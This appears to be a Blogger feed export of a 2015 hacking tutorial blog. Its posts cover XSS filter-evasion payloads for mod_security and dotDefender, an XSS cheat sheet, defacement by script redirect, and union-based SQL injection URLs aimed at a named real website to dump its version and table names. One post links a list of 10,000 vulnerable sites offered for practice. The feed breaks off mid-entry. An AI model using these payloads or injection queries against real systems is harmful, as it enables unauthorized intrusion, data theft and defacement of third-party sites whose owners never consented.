tag:blogger.com,1999:blog-55453254736664783342024-03-08T03:33:46.007-08:00Welcome To RAi Jee Official BlogLearn Ethical Hacking - Vulnerability Exploitation - Advanced Hacking MethodsAnonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.comBlogger26125tag:blogger.com,1999:blog-5545325473666478334.post-43700990617337588262015-09-05T08:26:00.002-07:002015-09-05T09:44:36.812-07:00Bypassing Modern XSS WAF Filters<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rGQVqD2648hymJKhoAGK0_CazbWBbBn93PSeHFOn2nRAg119OBTRsetM0fKUmyUE-qLVMBZ5RHZ6QxpOhgxtqlo2Fy5kPSqQQsYAdVH8d6jLab1DdBYkZps2K6HhKR9-jQKfnTASUFBA/s1600/Bypassing+Modern+XSS+WAF+Filters.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Modern XSS WAF Filters" border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rGQVqD2648hymJKhoAGK0_CazbWBbBn93PSeHFOn2nRAg119OBTRsetM0fKUmyUE-qLVMBZ5RHZ6QxpOhgxtqlo2Fy5kPSqQQsYAdVH8d6jLab1DdBYkZps2K6HhKR9-jQKfnTASUFBA/s400/Bypassing+Modern+XSS+WAF+Filters.png" title="Bypassing Modern XSS WAF Filters" width="400" /></a></div>
<br />
XSS (Cross-site Scripting) Attack is a Vulnerability that is occurs due to Failure of Input Parameters of the user and as well as the Server response of the Web Application.XSS Attack allows a attacker to insert his Malicious <b>HTML </b>code in the Target Website.<br />
In the Previous Tutorials on XSS we have Learn Some <a href="http://raijee1337.blogspot.com/2015/08/ultimate-guide-to-xss-cross-site-scripting.html" target="_blank"><b>Basics of XSS</b></a> Attack and the usage of <b><a href="http://raijee1337.blogspot.com/2015/09/xss-with-sql-injection.html" target="_blank">XSS With SQL injection</a>.</b><br />
<br />
<a name='more'></a><br /><br />
Now let's Come to the next part of<b> Bypassing the XSS WAF Filters</b> by using Different Techniques.<br />
In normal cases While we are trying to exploiting XSS Vulnerability we can easily break into the Security Because of Zero <b>Web Application Firewall Protection</b> on the Target site.<br />
But in Strong WAF's it is very Difficult To bypass the security and then attacker came to the Conclusion to Bypass the <b>XSS WAF Filters</b>.<br />
<br />
<span style="font-size: large;"><b>Bypassing Modern XSS WAF Filters:</b></span><br />
<span style="font-size: small;">Let's Start from the <b>Bypassing </b>basic <b>XSS PAYLOAD </b></span>that we mostly used on daily routine.<br />
Here is the XSS Payload:<br />
<br />
<b><scirpt>alert("XSS")</script></b><br />
<br />
When we execute this Payload <b> </b>,if<b> </b>there is Normal WAF on the Target site then we will be easily able to Exploit the <b>XSS ATTACK </b>but if there are some Modern WAF Filters then we have to Bypass that WAF Filters.Some WAF Filters automatically escapes some Characters from our XSS Payload like " <span style="font-size: large;">'</span> "(Single Quote) ," <span style="font-size: large;">"</span> " (Double Qoute) or "<b> <span style="font-size: large;">/</span></b> " (back-Slashes) .Here are some Methods for Bypassing these XSS Characters .<br />
<br />
<span style="font-size: small;"><b><span style="font-size: large;">Bypassing XSS WAF by using ASCII Value:</span></b></span><br />
In this Method we will bypass the XSS WAF by using ASCII Characters in our Target site .<br />
Let's Say this is our XSS Payload .<br />
<br />
<b><scirpt>alert("XSS")</script></b><br />
<br />
When we execute this Payload the <b>XSS WAF Filters </b>will Escaped some of our Characters like Single or Double Magic Quotes and our Payload doesn't work anymore.To bypass the Magic Quotes we will convert our Payload into<b> ASCII Characters </b>and then execute it.We can use Hackbar for Converting our XSS Payloads into ASCII Characters.Our ASCII Converted Value is work with in <b>Javascript Funtion</b>,when we will execute our ASCII Value The Javascript will Convert it into that Characters that we have encoded.<br />
<br />
For Example:<br />
<b>XSS Payload:</b><b><span style="color: red;">alert("XSS")</span></b><br />
<br />
<b>ASCII Converted Value:</b><br />
<b><span style="color: red;">String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)<span style="color: black;"></span></span></b><br />
<br />
Now we will add this Converted String into our XSS Payload:<br />
<b><scirpt></b><b><b><span style="color: red;">String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)</span></b></script></b><br />
<br />
This will Bypass <b>Characters </b>of our String<b> </b>which were blocked by the WAF Filters and our Script will bypassed successfully in the Target Site.<br />
<br />
<b><span style="font-size: large;">Bypassing XSS WAF by using Hex Encoding:</span></b><br />
<span style="font-size: small;">In this Method we will convert our whole XSS Payload into</span> Hex Value and then run it in the Target Site.This will execute our XSS Payload without getting it Blocked by the WAF.<br />
<br />
<b>Here is our XSS Payload:</b><br />
<br />
<b><scirpt>alert("XSS")</script></b><br />
<br />
<b>Encoded Value:%3c%73%63%69%72%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e</b><br />
<br />
So we will use this<b> Encoded Value </b>in the Target site .<br />
<!-- adsense -->
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Bypassing XSS WAF by OB</b><b>FUSCATING</b>:</span><br />
In this method we are going to use Upper case and lower Case Keywords in our XSS Payload for Bypassing the XSS WAF Filters.In some Cases the admin have Blocked some Plane words like <b>Alert </b>or <b>Script </b>And when we will Execute our XSS Payload the WAF Filters will automatically Escaped them and our Payload Doesn't Work.<br />
So in that case we have to Use Upper and Lower Case Letters instead of Plane Letters for Bypassing the XSS WAF Filters.<br />
<br />
<b>Here is Our XSS Payload:<scirpt>alert("XSS")</script></b><br />
<br />
<b>Bypassed XSS Payload:</b><b><b><sCiRPt>aLeRT("XSS")</sCriPT></b></b><br />
<br />
This XSS Payload<b><b> </b></b>will Bypass the XSS WAF Filter and we can easily able to run our Script.<br />
These are some Basic XSS WAF Bypassing Techniques That will help in XSS Attack.<br />
<br />
<span style="font-size: large;"><b>Bypassing XSS WAF Mod_Security:</b></span><br />
Some times when we execute our XSS Payload but there we Got a Error like.<br />
<b>"Not
Acceptable! An appropriate representation of the requested resource
could not be found on this server. This error was generated by
Mod_Security"</b><br />
<br />
So we have to Bypass the Mod_Security WAF on the Target Site.<br />
<br />
Our XSS Payload:<br />
<b><scirpt>alert("XSS")</script></b><br />
<br />
Here is the Bypass of our <b>XSS PAYLOAD:</b><br />
<b><scirpt>alert("XSS")</scri0pt></b><br />
<br />
<span style="font-size: large;"><b>Bypassing XSS WAF Dot Defender: </b></span><br />
<span style="font-size: large;"><span style="font-size: small;">Dot Defender is another Web Application Firewall (WAF) which restricted our Malicious Codes from reaching to the Target Sites.When we try to run our XSS query in the <b>Dot Defender WAF Protected</b> website it gives a Error .</span></span><br />
<br />
<b>"dotDefender Blocked Your Request"</b><br />
<br />
So in that case our Script Wont work there .We Need to bypass the<b> Dot Defender WAF </b>for making our malicious Scripts run in the web application.So here is the Bypassed XSS Payload for Dot Defender WAF.<br />
<br />
<b>Dot Defender WAF Bypassed XSS Payload: <svg/onload=prompt(1);> </b><br />
<span style="font-size: large;"><span style="font-size: small;"> </span><b> </b></span><br />
<b>AUTHOR:Rai Muzammal Hussain</b>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com24tag:blogger.com,1999:blog-5545325473666478334.post-36351789067166582332015-09-01T04:05:00.001-07:002015-09-04T08:11:16.723-07:00XSS with SQL Injection<br />
<div class="separator" style="clear: both; text-align: center;">
<img alt="XSS with SQL Injection" border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDj5RaxcNROlBrR4Qv6j3ClcQ2zwlsv_7RGPpXwuv1Eux_rt4W-l_klDnfxmrGG5dLix2Umr4BdQ4rmq4NuO6KMKDe19xqNXa30lGY0AykZsSZgEY7zR9cY1sDPcEZBKK0Hcl3ihPdCBTa/s400/XSS+with+SQL+Injection.png" title="XSS with SQL Injection" width="400" /></div>
<br />
In the Previous Tutorial <b><a href="http://raijee1337.blogspot.com/2015/08/ultimate-guide-to-xss-cross-site-scripting.html" target="_blank">Ultimate Guide to XSS</a><a href="http://raijee1337.blogspot.com/2015/08/ultimate-guide-to-xss-cross-site-scripting.html" target="_blank"> (Cross Site Scripting)</a></b><br />
We have cover the basics of XSS(Cross Site Scripting) and using its payloads in our Target Sites.So in this Tutorial you will learn XSS Attack via SQL Injection.<br />
If you are knew to XSS then i Suggest You To First Read out the Basics from the Previous Tutorial to know How it Works and What a attacker can do with XSS vulnerability.Once you have the Basic knowledge About XSS Attack then you will be able to better Understand this Tutorial <b>"XSS with SQL Injection"</b>.<br />
<a name='more'></a><br />
<br />
<br />
While we are trying to Exploit a website through XSS Attack , Mostly we went to Check some <b>"Input Area"</b> like <b>"Search Boxes"</b> or<b> "Login Area"</b> .But we can do the Same via SQL Injection on that Target Site.<br />
<br />
In XSS Attack via SQL Injection we will Execute our XSS payloads in <b>UNION BASED</b> query.<br />
<br />
<b>For Example:</b><br />
We have Found a website Which is vulnerable to SQL Injection and inject into the database.But there we can also Execute our XSS Payloads in our Union Based Query.lets Take a site for Practice,<br />
Here is The TARGET Site .<br />
<b><br /></b>
<b>http://www.smelisting.net/corner_category.php?id=7</b><br />
<br />
if we add Single Quote at the end of the Parameter it gives<b> MYSQL Error.</b><br />
<br />
<b>"You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''7''
order by id desc' at line 1"</b><br />
<br />
After Counting the Columns there are 5 Total Number of Columns.So let's ready up our Union Based Query and execute it . <br />
<br />
<b>http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,3,4,5--+</b><br />
<br />
There we got 3rd Column is printed on the page as output , So we will execute our XSS Payload in that column . <br />
<br />
Here is the our <b>XSS Payload</b> that we are going to inject into the <b>UNION BASED </b>Query,<br />
<br />
<span style="font-size: small;"><b>XSS PAYLOAD : <script>alert('XSS');</script></b></span><br />
<br />
<span style="font-size: small;">Before executing this Payload we need to Encode it in <b>HEX Value</b></span>.<br />
Here is the HEX Value of our Payload and add 0x in the start.<br />
<br />
<b>HEX VALUE:0x3c7363726970743e616c657274282758535327293b3c2f7363726970743e</b><br />
<br />
Let's Insert this payload in our Union Based Query and Execute the query,<br />
<br />
<b>http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,0x3c7363726970743e616c657274282758535327293b3c2f7363726970743e,4,5--+</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95U0uw0jW1Ws55SCWEtqyDvQ3_xLpj99Tn_wKQzoJTuRH3OSmuNXrUAI4owewRaKME2UJoLGPEnkOndYAD5A5DdUzLU7C3Umnsv6hGn4-J6IuHcSVXBopP1w1Lyvpyk961PAdBWohQEbE/s1600/XSS+with+SQL+Injection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95U0uw0jW1Ws55SCWEtqyDvQ3_xLpj99Tn_wKQzoJTuRH3OSmuNXrUAI4owewRaKME2UJoLGPEnkOndYAD5A5DdUzLU7C3Umnsv6hGn4-J6IuHcSVXBopP1w1Lyvpyk961PAdBWohQEbE/s400/XSS+with+SQL+Injection.png" width="400" /></a></div>
<br />
<br />
This Payload will Display us a XSS Pop-up Alert .This is the basic XSS Payload ,you can try more Payloads which were posted in the This <b><a href="http://raijee1337.blogspot.com/2015/08/ultimate-guide-to-xss-cross-site-scripting.html" target="_blank">Tutorial</a>.</b><br />
<br />
<!-- adsense -->
<span style="font-size: large;"><b>Manipulating SQL Injection Queries in XSS Payload</b></span><br />
<br />
If we go on Further , we can also show our SQLi Queries Result in a XSS POP-Up Alert.We will insert our SQLi Queries in XSS Payload for showing up SQL Queries output in a POP-Up.<br />
First let's say we want to Show The Current Version of the Target Site in a XSS POP-Up .See the example, <br />
<br />
<span style="font-size: small;">Our XSS Payload for Showing Version in a POP-Up:</span><br />
<br />
<b><img src=x onerror="javascript:alert('<span style="color: lime;"><span style="color: black;"><span style="color: blue;">Your_name:</span></span>Version:</span>,<span style="color: red;">version()</span>,0x')"></b><br />
<br />
The Red highlighted Text is our SQLi Query and Blue Text is injector name and the Green Text is That we have put for our Variable , and the Other one is Our XSS Payload.<br />
Before executing our Query we need to encode our XSS Payload in Hex Value.<br />
<br />
<b>Hex Value of XSS Payload:</b><br />
0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c657274<br />
2827524169204a65657e3a56657273696f6e3a,<b><span style="color: red;">version()</span></b>,0x30782729223e<br />
<br />
Let's insert our XSS Payload in the Vulnerable column for Showing the Pop-up for Current Version.<br />
<br />
<b>http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c657274282752</b><br />
<b>4169204a65657e3a56657273696f6e3a,version(),0x30782729223e),4,5--+</b><br />
<br />
Let's Execute our Payload:<b> </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbcD50vQF2j8E7tEeQx1nN2olY9zkwFoNjPZGaxE0NF3Xctyldml3q-dLHI-I9hShfWeAC5S1-APigJ_0eI6MfyfDq0CPTwc3vix7-10TlDosefkd5HxL_8i4ATYSEDJqvGLahU8H6-Dt6/s1600/XSS+with+SQL+Injection+-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XSS with SQL Injection" border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbcD50vQF2j8E7tEeQx1nN2olY9zkwFoNjPZGaxE0NF3Xctyldml3q-dLHI-I9hShfWeAC5S1-APigJ_0eI6MfyfDq0CPTwc3vix7-10TlDosefkd5HxL_8i4ATYSEDJqvGLahU8H6-Dt6/s400/XSS+with+SQL+Injection+-1.png" title="XSS with SQL Injection" width="400" /></a></div>
<br />
and here we got the Current Version in a XSS Pop-up.We can Do the Same For the Current Database and user.<br />
After POP-UP the <b>Version </b>next part is To Showing Tables in a XSS POP-UP Alert.So we have to Insert our Query in XSS Payload for Displaying them in XSS Alert.<br />
Here is our DIOS Query for getting Tables from the Current Database.<br />
<br />
<b>(select group_concat(table_name) from information_schema.tables where table_Schema=database())</b><br />
<br />
Let's Add this <b>DIOS </b>Query in our XSS Payload .<br />
<br />
<b>http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c657274</b><br />
<b>2827524169204a65657e3a56657273696f6e3a,version(),(select group_concat(table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5--+</b><br />
<br />
Now execute this Query and Check the output Response.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5aBWO613oRr-Hv-ofl2x4B2ndIU0Nz-Ap7aHUeYMdngsRpQBrxPw8qoX0hnhV2rgv20yPYcwhJt9UXGEkEw0wplekVMAr5X8mX89X5Lj6qAp6kpwOu8IiLoyaZKZjXMFVNbH0jGdfVzs7/s1600/XSS+with+SQL+Injection+-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XSS with SQL Injection" border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5aBWO613oRr-Hv-ofl2x4B2ndIU0Nz-Ap7aHUeYMdngsRpQBrxPw8qoX0hnhV2rgv20yPYcwhJt9UXGEkEw0wplekVMAr5X8mX89X5Lj6qAp6kpwOu8IiLoyaZKZjXMFVNbH0jGdfVzs7/s400/XSS+with+SQL+Injection+-2.png" title="XSS with SQL Injection" width="400" /></a></div>
<br />
<br />
We got the Tables from the current Database . But if we go on Further and add <a href="http://raijee1337.blogspot.com/search/label/Adding%20HTML%20Tags%20in%20SQL%20Queries" target="_blank">HTML TAGS</a> for Starting each Table in a New Line like<b> <BR></b>.But Here This HTML Doesn't Work.<br />
In XSS we use<b> " \n " </b>which is used for showing each result in a new Line.So will add This Part to Our <b>DIOS Query </b>to show All Tables in a New Line in our XSS Pop-Up.<br />
<br />
We Need to First Encode it in Hex Value and then Insert into DIOS Query.<br />
<br />
<b>HEX Value: \</b><b>n :0x5c6e</b><br />
<br />
Let's Add it in our XSS Payload<b> :</b><br />
<b><br /></b>
<b>http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c657</b><br />
<b>2742827524169204a65657e3a56657273696f6e3a,version(),(select group_concat(0x5c6e,table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5--+</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUDRO5e64MMfhpfzpavdu3pdRVfHVtNpMPiEhHtTBP1QqOqu_tziid_yB4wpufQ2zHBLCHBAAe5RTRlg3P7-Y1ldfreLTiDj_lEmxZmbpVOca-lpJpXK1wF2rYHWd8YD4FoK38_5WV8888/s1600/XSS+with+SQL+Injection+-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XSS with SQL Injection" border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUDRO5e64MMfhpfzpavdu3pdRVfHVtNpMPiEhHtTBP1QqOqu_tziid_yB4wpufQ2zHBLCHBAAe5RTRlg3P7-Y1ldfreLTiDj_lEmxZmbpVOca-lpJpXK1wF2rYHWd8YD4FoK38_5WV8888/s400/XSS+with+SQL+Injection+-3.png" title="XSS with SQL Injection" width="400" /></a></div>
<b><br /></b>
And Here we can see all tables are starting from a New line in XSS Pop-up Alert Box.We can do the Same For Columns by adding that Part in our DIOS Query.I Leave That part for You Guys.<br />
<b><br /></b>
<b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com6tag:blogger.com,1999:blog-5545325473666478334.post-43453321294461004522015-08-23T09:03:00.001-07:002015-08-23T09:42:45.055-07:00Ultimate Guide to XSS (Cross Site Scripting)<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqFxYMh5gtMwGthkck9zck5VKqCb7O-tmDtPXIgWcDq9lYVt3tdTi6Z1coMLKhXnw2BjR-u2mJegQ28t8m0qExE98nJQyf9nJlqwk8iWbR16VSevsj8Y7x-Ie-EQHV7gsCoXLeOc29fr2T/s1600/Ultimate+Guide+to+XSS+%2528+Cross+Site+Scripting+%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Ultimate Guide to XSS (Cross Site Scripting)" border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqFxYMh5gtMwGthkck9zck5VKqCb7O-tmDtPXIgWcDq9lYVt3tdTi6Z1coMLKhXnw2BjR-u2mJegQ28t8m0qExE98nJQyf9nJlqwk8iWbR16VSevsj8Y7x-Ie-EQHV7gsCoXLeOc29fr2T/s400/Ultimate+Guide+to+XSS+%2528+Cross+Site+Scripting+%2529.png" title="Ultimate Guide to XSS (Cross Site Scripting)" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<b><span class="post-description" style="text-align: justify;"></span></b></div>
<span class="post-description" style="text-align: justify;">Today i'm going to</span><b><span class="post-description" style="text-align: justify;"> </span></b><span class="post-description" style="text-align: justify;">Posted </span><span class="post-description" style="text-align: justify;">a Hand Guide to XSS for Newbies . </span><br />
<span class="post-description" style="text-align: justify;">A lot of People ask me to write Some Tutorials on XSS , so i've Decided to also cover XSS for them . </span><br />
<h3>
<span class="post-description" style="font-size: large; text-align: justify;">What is XSS ?</span></h3>
<span class="post-description" style="text-align: justify;">This in known to Everyone that XSS is also Stands for Cross Site Scripting.XSS is one of The Most Web Application Common Vulnerabilities increasingly Popular in this Time which allow a Attacker to Submitting his malicious Queries or Codes in the Target Website's<b> "Search Boxes" </b>as well as in the Target URL.</span><br />
<a name='more'></a><br />
<span class="post-description" style="text-align: justify;">This vulnerability occurs due to Poor Developing application of the code.A Attacker able to inject his malicious HTML code through client web browsers.</span><br />
<span class="post-description" style="text-align: justify;">Mostly The Whole XSS Attack is based on <b>Javascript</b> and <b>HTML </b>for Executing malicious Codes in Target Website .Once a attacker will be able to run his code with the Javascript on the Web then when the User will come to the site and click on that malicious link that Javascript will be executed .Mostly People Do XSS and Show a Pop-up With their Name to advertise themselves .</span><br />
<span class="post-description" style="text-align: justify;">XSS can be used for Phishing as well as Stealing Accounts or we can do some Social </span>Engineering with XSS.<br />
<br />
<h4>
<span style="font-size: large;">A Simple XSS Example</span></h4>
This is Simple example of XSS that what we can do with it . For Example a Attacker have found XSS vulnerability in a High Profile Website and which have a lot of users.And there we will be able to run our Malicious code with <b>JAVASCRIPT</b>.Whenever a user come to that website our malicious Code will be Executed and we can use that code for Redirecting the User to any Fake Page that we want or Like Phishing PAGE.<br />
<br />
<h4>
<span style="font-size: large;"><b>XSS ATTACK</b></span></h4>
First we have to Find a Vulnerable Website for Practicing XSS .Finding XSS vulnerable website is easy than SQLi sites.In SQL injection we simply have to Add single Quote ' at the End of the Parameter to Check if the Target site is vulnerable or Not but in XSS we have to Determine to XSS Vulnerability by Executing Multiple XSS Queries .<br />
<br />
Mostly That places where we can test For XSS vulnerability are a <b>"SEARCH BOX"</b> or<b> "Login or Register"</b> or any other <b>Input Field </b>where we can execute our Script .<br />
Once we will found a Input Field where we can Execute or Code like a Search Box.<br />
Basically This query is most Common for Testing XSS but you can try other queries as well.<br />
<b> </b><br />
<span style="font-size: large;"><b><script>alert("XSS")</script></b></span><br />
<br />
<span style="font-size: large;"><span style="font-size: small;">Once we will put this Query in the Search Box and then execute it, it will display us a Pop-up with "XSS" String.If there are Normal Filters Then our Query will be Successfully Executed and it shows us a Pop-up but in advanced Filters Some Characters are Blocked and we need to bypass them. <b><br /></b></span></span><br />
<!-- adsense -->
<br />
<h4>
<span style="font-size: large;">XSS Cheat Sheet: </span></h4>
<b><script>alert(1);</script></b><br />
<b><script>alert('XSS');</script></b><br />
<b><span style="font-size: large;"><span style="font-size: small;"><IMG SRC=javascript:alert(&quot;XSS&quot;)></span></span></b><br />
<span style="font-size: large;"><b><span style="font-size: small;"><IMG SRC=javascript:alert('XSS')><br /><scr<script>ipt>alert('XSS');</scr</script>ipt><br />'><script>alert(0)</script><br /><img src=foo.png onerror=alert(/xssed/) /><br /><style>@import'ja asc<br />ipt:alert("XSS")';</style><br /><? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?><br /><marquee><script>alert('XSS')</script></marquee><br /><IMG SRC="jav&#x09;ascript:alert('XSS');"><br /><IMG SRC="jav&#x0A;ascript:alert('XSS');"><br /><IMG SRC="jav&#x0D;ascript:alert('XSS');"><br /><script src=http://yoursite.com/your_files.js></script><br /></title><script>alert(/xss/)</script><br /><IMG DYNSRC="javascript:alert('XSS')"><br /><img src=javascript:alert('XSS')><br /><script language=JavaScript>alert('XSS')</script><br /><body onunload=javascript:alert('XSS');><br /><body onLoad='alert('XSS');'<br />[color=red' onmouseover='alert('xss')']mouse over[/color]<br />'/></a></><img src=1.gif onerror=alert(1)><br />window.alert('Bonjour !');<br /><div style='x:expression((window.r==1)?'':eval('r=1;<br /><iframe<?php echo chr(11)?> onload=alert('XSS')></iframe><br />'>><marquee><h1>XSS</h1></marquee></span></b></span><br />
<br />
<span style="font-size: large;"><b><span style="font-size: small;"><span style="font-size: large;">Understanding XSS WAF's Behaviour </span></span></b></span><br />
<br />
<span style="font-size: large;"><span style="font-size: small;">Use Different queries for Better results.Each site WAF's Filter Different Characters.</span></span><br />
<span style="font-size: large;"><span style="font-size: small;">In some sites when we try to Find XSS vulnerability and sometimes when we failed but if we notice our Payload in source page of the Target Website their are some Characters missing like <b>></b>, <b>"</b> ,<b> /</b> </span></span><br />
<br />
<span style="font-size: large;"><span style="font-size: small;">It is because of that Web Application Firewall is Blocking these character.There we need to bypass these character with different bypassing Techniques.For Example .</span></span><br />
<br />
<b><span style="font-size: large;"><span style="font-size: small;">Bypassing XSS Payload via Hex Enoding</span></span></b><br />
<br />
<span style="font-size: large;"><span style="font-size: small;"><b>Bypassing XSS Payload via Ascii Encoding</b></span></span><br />
<br />
<h4>
<span style="font-size: large;"><span style="font-size: small;"><span style="font-size: large;">Defacing via XSS</span></span></span></h4>
<span style="font-size: large;"><span style="font-size: small;"><span style="font-size: large;"><span style="font-size: small;">Many people ask How they Can deface via XSS so i've decided to add this Part also in this Tutorial .A lot of people injecting Sites whole the day for just for defacing.Defacing via XSS is simple as 1,2,3,4,5.</span></span></span></span><br />
<span style="font-size: large;"><span style="font-size: small;"><span style="font-size: large;"><span style="font-size: small;">So in XSS we have to Put our Deface Page HTML Uploaded Link in our String.we can use some Sites that used for Uploading HTML Files , Like<span style="font-size: large;"> </span></span></span></span><b> </b></span><br />
<br />
<span style="font-size: small;"><b>http://www.pastehtml.com</b></span><br />
<br />
<span style="font-size: large;"><span style="font-size: small;">After Uploading your deface HTML on this site there you will get the Link of your File ,just copy it and Put it in XSS Payload .</span></span><br />
<b><script>window.location="http://www.pastehtml.com/DefacePAGE/";</script></b><br />
when you will execute this query in the XSS vulnerable Website there you can see your Deface Page<b> </b>in the<b> Pop-up.</b><br />
<b><br /></b>
<b>Author:Rai Muzammal Hussain a.k.a RAi Jee</b><br />
<span style="font-size: large;"><span style="font-size: small;"><span style="font-size: large;"><span style="font-size: small;"> </span></span> </span><span style="font-size: small;"><br /></span></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com5tag:blogger.com,1999:blog-5545325473666478334.post-2924856408719633422015-08-14T03:33:00.000-07:002015-08-17T09:11:59.463-07:00Cookie Based Injection<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgREkxqj7b8lBIq2cCydrJcMe0-97hlrdopMlnr_gniyoPsNssuQU4S49MNPR6NNwTOz48nMKRxSyFJj9vISwSxUOvEl4lP-5V_oVT75uYBBptzYhEzgXaIwlHgmxVgR9Z3CmdqsKEf_jX0/s1600/Cookie+Based+Injection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Cookie Based Injection" border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgREkxqj7b8lBIq2cCydrJcMe0-97hlrdopMlnr_gniyoPsNssuQU4S49MNPR6NNwTOz48nMKRxSyFJj9vISwSxUOvEl4lP-5V_oVT75uYBBptzYhEzgXaIwlHgmxVgR9Z3CmdqsKEf_jX0/s320/Cookie+Based+Injection.png" title="Cookie Based Injection" width="320" /></a></div>
In This Tutorial You will learn How to inject a Website Through Cookies.<br />
You will Learn How to inject a website Via Cookies Step by Step Guide in this Video Tutorial.<br />
<!-- adsense -->
<a name='more'></a><br />
Watch This Tutorial Cookie Based SQL Injection:<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/6x8hFpMapWE/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/6x8hFpMapWE?feature=player_embedded" width="320"></iframe></div>
<br />Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com5tag:blogger.com,1999:blog-5545325473666478334.post-82967999079945815702015-08-10T10:50:00.001-07:002015-08-17T09:10:10.769-07:0010000 Fresh SQLi Vulnerable Websites List<span style="font-weight: normal;"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNasoqGln0rJiQ5Gh1uLnvd4chcACwQlAPFZnNZb7tdOpKvm5_thyphenhyphenFfLaOaLz2lAtOfnc3UT7PZU6Uf6vszZ9e2VKtNWOfM75mXoWybQHV0oYPlYk57q6QG7hur2GFEi9kBpvyfK4YHPnd/s1600/10000+Fresh+SQLi+Vulnerable+Websites+List.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="10000 Fresh SQLi Vulnerable Websites 2015 List" border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNasoqGln0rJiQ5Gh1uLnvd4chcACwQlAPFZnNZb7tdOpKvm5_thyphenhyphenFfLaOaLz2lAtOfnc3UT7PZU6Uf6vszZ9e2VKtNWOfM75mXoWybQHV0oYPlYk57q6QG7hur2GFEi9kBpvyfK4YHPnd/s400/10000+Fresh+SQLi+Vulnerable+Websites+List.png" title="10000 Fresh SQLi Vulnerable Websites 2015 List" width="400" /></a></div>
<br />
<span style="font-weight: normal;">Here is SQLi Fresh 10000 Vulnerable Websites for Practice. These Vulnerable Websites will Help You to Polish Your Skills.You Can Use These Sites For Increasing Your Skills In SQLi and For Tutorials keep In Touch with <b>www.raijee1337.blogspot.com</b>.You can Also Comment Your Questions in case Of Any Problem While Injecting .</span><br />
<!-- adsense -->
<a name='more'></a><br />
For SQLi 10000 Fresh Vulnerable Sites Visit this Link : http://pastebin.com/ATJE7VdZ<br />
<br />Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com5tag:blogger.com,1999:blog-5545325473666478334.post-18391058430650707012015-08-06T10:42:00.002-07:002015-08-17T09:09:02.478-07:00Alternative Ways For Counting Columns At One Request<div class="separator" style="clear: both; text-align: center;">
